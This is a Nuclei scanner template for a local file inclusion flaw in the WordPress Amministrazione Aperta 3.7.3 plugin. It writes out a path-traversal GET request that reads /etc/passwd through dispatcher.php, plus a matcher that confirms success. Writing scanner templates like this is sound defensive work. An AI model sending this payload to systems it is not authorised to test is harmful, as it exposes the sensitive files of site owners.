nuclei-templates/http/vulnerabilities/wordpress/amministrazione-aperta-lfi....

35 lines
1.1 KiB
YAML

id: amministrazione-aperta-lfi
info:
name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion
author: daffainfo,Splint3r7
severity: high
description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/50838
- https://wordpress.org/plugins/amministrazione-aperta
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: wp-plugin,lfi,wp,edb,wordpress
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a004730450220483f16724935dcc058e8021d5b6eed5abd21252eecf528ed52a6c648c2fcc138022100a6df64050b8681607c16b6684dc3344056e6838828fd12baf1f99be86c95fc13:922c64590222798bb761d5b6d8e72950